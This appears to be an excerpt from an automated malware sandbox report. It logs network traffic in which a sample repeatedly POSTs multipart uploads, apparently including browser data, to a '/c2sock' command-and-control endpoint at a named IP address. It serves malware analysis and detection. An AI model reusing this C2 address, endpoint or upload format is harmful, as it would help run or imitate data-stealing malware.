                                                            Nov 13, 2024 10:53:54.673612118 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.673723936 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.721762896 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.721883059 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.769609928 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.769722939 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.817533016 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.817682981 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.869499922 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.869616032 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.917643070 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.917871952 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:54.965455055 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:54.965547085 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.013722897 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.013859034 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.065666914 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.065799952 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.117602110 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.117829084 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.165452957 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.165537119 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.213546038 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.213627100 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.261476040 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.261632919 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.313513041 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.313613892 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.361552954 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.361720085 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.413635015 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.413785934 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.465604067 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.465747118 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.513621092 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.513729095 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.565644026 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.565767050 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.613742113 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.613925934 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.661509037 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.661675930 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.709538937 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.709703922 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.761611938 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.761702061 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.813693047 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.813812971 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:55.861411095 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:55.861531973 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.109730959 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:56.109844923 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.157599926 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:56.157773018 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.205497980 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:56.205763102 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.253586054 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:56.253735065 CET4998080192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.516568899 CET804998094.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:56.914824963 CET4998180192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.919939995 CET804998194.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:56.920036077 CET4998180192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.922374964 CET4998180192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.922898054 CET4998180192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:53:56.927264929 CET804998194.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:53:56.927804947 CET804998194.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:05.396538019 CET804998194.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:05.396672010 CET4998180192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:05.396857023 CET4998180192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:05.401731014 CET804998194.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:05.725703955 CET4998280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:05.730720043 CET804998294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:05.730789900 CET4998280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:05.730923891 CET4998280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:05.731324911 CET4998280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:05.735932112 CET804998294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:05.736185074 CET804998294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:14.201185942 CET804998294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:14.201355934 CET4998280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:14.201560020 CET4998280192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:14.206455946 CET804998294.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:14.665246010 CET4998380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:14.671256065 CET804998394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:14.671372890 CET4998380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:14.671668053 CET4998380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:14.672238111 CET4998380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:14.677119017 CET804998394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:14.677638054 CET804998394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:23.154150963 CET804998394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:23.154328108 CET4998380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:23.154366970 CET4998380192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:23.160890102 CET804998394.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:23.454792023 CET4998480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:23.459851980 CET804998494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:23.459990978 CET4998480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:23.460114956 CET4998480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:23.460529089 CET4998480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:23.465070963 CET804998494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:23.465387106 CET804998494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:31.935220957 CET804998494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:31.935364962 CET4998480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:31.935455084 CET4998480192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:31.940392971 CET804998494.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:32.248076916 CET4998580192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:32.253062010 CET804998594.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:32.253192902 CET4998580192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:32.253587008 CET4998580192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:32.254940987 CET4998580192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:32.258415937 CET804998594.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:32.259800911 CET804998594.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:40.737131119 CET804998594.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:40.737247944 CET4998580192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:40.737322092 CET4998580192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:40.742356062 CET804998594.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:41.031769991 CET4998680192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:41.036911011 CET804998694.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:41.037025928 CET4998680192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:41.037240982 CET4998680192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:41.037622929 CET4998680192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:41.042040110 CET804998694.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:41.042493105 CET804998694.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:49.522548914 CET804998694.158.244.69192.168.2.9
                                                            Nov 13, 2024 10:54:49.522715092 CET4998680192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:49.522779942 CET4998680192.168.2.994.158.244.69
                                                            Nov 13, 2024 10:54:49.527621984 CET804998694.158.244.69192.168.2.9
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 13, 2024 10:51:54.627157927 CET1.1.1.1192.168.2.90xbe8cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                            Nov 13, 2024 10:51:54.627157927 CET1.1.1.1192.168.2.90xbe8cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                            • 94.158.244.69
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.94982294.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:52:44.624311924 CET190OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 16465
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:52:44.624716043 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                            Nov 13, 2024 10:52:44.629723072 CET1236OUTData Raw: b8 98 24 1a ee a2 4a 31 fc f4 2d 36 61 7d 5f f8 0d 69 3d 38 2d 4a 33 33 99 fd 62 c4 58 54 bc e5 3a 98 95 e2 43 cf c6 1a 92 51 19 79 8c 99 04 a4 16 6d da ee bc 66 33 6b 88 2f ce 7c 7e 3f 38 eb f9 13 b9 bf 0d 89 18 84 dd 34 23 49 14 0a ad ad 6f 8b
                                                            Data Ascii: $J1-6a}_i=8-J33bXT:CQymf3k/|~?84#Iolfgj>7;,)emVVV*(MLd^1EsHHi)8;@IAMQhpZS`hA4SjuF-~~
                                                            Nov 13, 2024 10:52:44.630249977 CET4105OUTData Raw: 00 a4 0f ec ff 01 00 00 80 f4 81 fd 3f 00 00 00 90 3e b0 ff 07 00 00 00 d2 07 d6 7f 00 00 00 20 7d 60 fd 07 00 00 00 d2 07 7e ff 07 00 00 00 d2 47 7e e0 4d 21 97 d5 04 f1 9f 72 ff 9b 9b cf 6a fd 7f 3d 50 13 00 00 df 14 fb 73 1f 88 d2 93 27 99 17
                                                            Data Ascii: ?> }`~G~M!rj=Ps'RhEjQVuJ{<k#EtvR]_Z"x@HIKrwrL,hm/#_|+xV+6;:TFC-UIi$)dAc8


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.94987394.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:52:53.680162907 CET190OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 18997
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:52:53.680804014 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"2--SqDe87817huf871793q74Content-Disposition: form-data;
                                                            Nov 13, 2024 10:52:53.685009003 CET1236OUTData Raw: e8 c3 8f a3 ae 0d 8d b9 67 93 5e 50 24 18 24 36 71 d3 60 97 16 45 26 29 74 57 1a 43 81 dc 9d 92 ab 4c 68 08 46 e3 ce d7 7c 7b b0 7e 96 6b 9d 3f 5f dd b7 86 e3 0d 8d 77 21 d5 84 19 9a 67 bb bb ee a1 80 d5 fc 28 33 1b 0d 9d 25 77 bb 51 41 bf 99 58
                                                            Data Ascii: g^P$$6q`E&)tWCLhF|{~k?_w!g(3%wQAXv 0xu{^4B[nu0K_nozI5%~rPvEIo}"*i]|nv|v]-D_Z.T_TQ"V|6lH-@zLY~/z
                                                            Nov 13, 2024 10:52:53.685817957 CET4944OUTData Raw: 47 5d 12 84 07 5f 98 1d 40 c3 04 7e 70 84 1b e7 28 06 6d 87 e3 e2 1e c4 9c 3d 9b 79 78 1e 7a 55 3d ca 0f f4 51 6d dd be a3 36 5a db 97 cb 9a 88 b9 ba 0e 52 68 eb d8 4b 66 fb 6e 79 dc 1b 8f 0d 85 6b 5d be 7c e0 c5 b8 5c b2 3c c6 ca 35 65 b9 dc dc
                                                            Data Ascii: G]_@~p(m=yxzU=Qm6ZRhKfnyk]|\<5eFM'1bexbXyf2IxH0m,0X(i#a(F!L5Xsys<Y${|!$t3/ , AA# AY<p Ad8]2L
                                                            Nov 13, 2024 10:52:53.685841084 CET1693OUTData Raw: b8 28 e6 26 f4 a2 11 17 b8 a5 eb 4b d3 fd c2 dc c8 08 83 3e 8b 8f 32 09 3d 3f 7d b6 35 a5 e9 73 d3 dd 2e f3 ad 40 32 19 06 77 17 27 89 ba ff 3f 26 c6 b1 f1 c1 f8 64 fc 30 be 11 00 00 00 00 00 00 00 b8 54 b3 7a 59 fb 73 1d 20 9d d3 8b 5a 4c fb 44
                                                            Data Ascii: (&K>2=?}5s.@2w'?&d0TzYs ZLD^_Tz^'nsG*?"p~PK#m.PPK&mYEdge/Default/BrowserDB/CURRENTuts5C.PKr


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            2192.168.2.94992394.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:53:02.747658968 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:53:02.748101950 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            3192.168.2.94997494.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:53:11.772420883 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:53:11.772795916 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            4192.168.2.94997794.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:53:20.556585073 CET188OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 440
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:53:20.556936979 CET440OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            5192.168.2.94997894.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:53:29.597868919 CET190OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 20514
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:53:29.598329067 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"3--SqDe87817huf871793q74Content-Disposition: form-data;
                                                            Nov 13, 2024 10:53:29.602725983 CET1236OUTData Raw: ad 16 87 46 e2 e1 2e 9d 79 eb 03 a0 e5 19 56 6f a5 bf ff e0 db 33 7d a7 07 d6 ba da 5a 47 d6 b8 d0 5a 53 36 cd a7 de 96 ed 3b bc ab 75 ff 58 c8 ba 58 8a 96 b9 b1 3d b6 cf da b8 ea 46 ee 50 b3 79 33 2f cb ce 6f ab 1f eb a5 fa e7 53 b7 ae 3d 8a b1
                                                            Data Ascii: F.yVo3}ZGZS6;uXX=FPy3/oS=Jy}n0F#}djAhy[<!`(w__Y>7]\:$jmS(hvxXH;kj4ne_m&/vfvJOtUkZm^Vae3l
                                                            Nov 13, 2024 10:53:29.603280067 CET2472OUTData Raw: f1 71 64 a2 5c 2f 5b b8 58 28 4d 16 86 27 a3 86 cb f9 2b e5 d9 9d 3d 9d ce 7d aa 38 5a 2a ec 2a 4d 45 9f ca 57 eb 09 8d cc 81 3d fb ee db 79 ef fe 3d f7 ec bf 77 f7 e8 bd bb ef f9 a5 9d cf cd 8c 27 27 32 9b 82 5f 09 06 72 b9 c6 cc 46 93 bd d6 bc
                                                            Data Ascii: qd\/[X(M'+=}8Z**MEW=y=w''2_rFuG}^+'F=gNm$-x@www.Wf\HfB<8MHrTr:P+'zHajP~pxi J\kO+OcfcS?V~l{3
                                                            Nov 13, 2024 10:53:29.603368998 CET2472OUTData Raw: f8 89 f0 2f c2 af 86 ff 24 7c 31 ac 86 a3 51 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fc ac 6e 4e 27 32 89 ae 20 93 79 fd d9 4f 7e f1 d5 0d f5 68 ba 11 3d 78 fb 4d f5 68 aa 19 ed a9 47 93 cd
                                                            Data Ascii: /$|1QnN'2 yO~h=xMhGh7$b,XR{6WSZInbf^O4a1_I_NZ(_$Lg?W7,E~Sk5ktFO|3K=IFR
                                                            Nov 13, 2024 10:53:29.603410959 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:
                                                            Nov 13, 2024 10:53:29.603435993 CET738OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                            Data Ascii:


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            6192.168.2.94997994.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:53:38.629818916 CET189OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 1135
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:53:38.630177021 CET1135OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            7192.168.2.94998094.158.244.69807712C:\Users\user\Desktop\OlZzqwjrwO.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 13, 2024 10:53:47.808826923 CET191OUTPOST /c2sock HTTP/1.1
                                                            Connection: Keep-Alive
                                                            Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                            User-Agent: TeslaBrowser/5.5
                                                            Content-Length: 594382
                                                            Host: 94.158.244.69
                                                            Nov 13, 2024 10:53:47.809458971 CET11124OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 7b 61 33 33 63 37 33 34 30 2d
                                                            Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"{a33c7340-61ca-11ee-8c18-806e6f6e6963}--SqDe87817huf871793q74Content-Disposition: form-data; name="pid"1--SqDe87817huf871793q74Content-Disposition: form-data;
                                                            Nov 13, 2024 10:53:47.814718962 CET1236OUTData Raw: bc 8f 9a fa 5f f4 8c e0 aa 5d 6f cb 6a fc af 90 b1 4e d0 e4 80 69 eb fc 2a f5 bf f4 89 f4 b2 d8 eb 8b c1 fe 5e e1 81 d2 fa fc 6b 0d b5 7b bd 4c 7e 96 d9 fb 8a 31 db a6 7b 8a 55 f4 18 7b cf ed 61 e8 27 f6 ea 00 f9 bc 5f dd ff 2b e6 7f ac 7d bc 50
                                                            Data Ascii: _]ojNi*^k{L~1{U{a'_+}PU?Vlx?1=Gm#I/9#R'd:I%S}U<X]V>)Ff%*$K^,wCYrG!Y|{,b,=7,_n,fLYp}!T
                                                            Nov 13, 2024 10:53:47.815501928 CET2472OUTData Raw: 7b 6c 92 fc 4f 1b 9e 17 6e 7c 64 7f f0 3f 93 0d fa 2e 78 4c 7b 6c e0 7d a6 63 f0 3f 9e 28 fb 93 c7 52 d7 ff f5 ef ea d7 fb 71 fb f3 c3 dc 4f 46 1b a0 67 7e f0 be 31 47 76 d5 af 14 6d 83 74 9c ce 93 f1 b1 e0 b8 0c ce 8f a4 7a 42 8a b0 3f e9 7f d2
                                                            Data Ascii: {lOn|d?.xL{l}c?(RqOFg~1GvmtzB?Q9q^}:Y@-vw<ZAnNGGvG5?Nk6eR/hvWkg?2?-5
                                                            Nov 13, 2024 10:53:47.815525055 CET2472OUTData Raw: c7 67 fe f2 9e 60 b9 ad 67 81 b0 3e 5f d4 ef c1 ff c8 f7 70 1c d6 07 df a3 d7 31 fd 7a f8 fe c7 cd 10 e6 07 03 84 ff 91 e3 f1 3e 60 6e 82 a6 63 bc 36 50 fa 1f 1d d3 d7 79 35 7d a8 eb e3 86 47 e7 64 bf 2f f7 3b d9 ff 4b 9e 27 e7 fc 62 7d 40 be 06
                                                            Data Ascii: g`g>_p1z>`nc6Py5}Gd/;K'b}@ O+Y_#(k6<^M%T;?Yg?Yxi?`>7J F{_ZW2>Z& }:7zAEJ>XW=6<=^k
                                                            Nov 13, 2024 10:53:47.815625906 CET2472OUTData Raw: aa 75 43 db ff 5b fd 67 aa f4 7b 84 be 4b 05 7e 97 e5 bd ac ff b5 ae ff d9 fe 5f eb 7f 1d bd ff b7 59 fc cf e4 80 f5 f2 bf 80 fd b5 98 ff d9 fe 5f eb 7f ad e0 7f 14 eb 7f f9 f6 ff 5a ff b3 fd bf 8d f2 3f 53 dd 5f 23 fd 2f ae 1f 38 6c 80 ed 21 db
                                                            Data Ascii: uC[g{K~_Y_Z?S_#/8l!?Y!\/>bo<e q3F99 |}o_&}O?6'}8:Al|gqutYd~I5f\.UZ
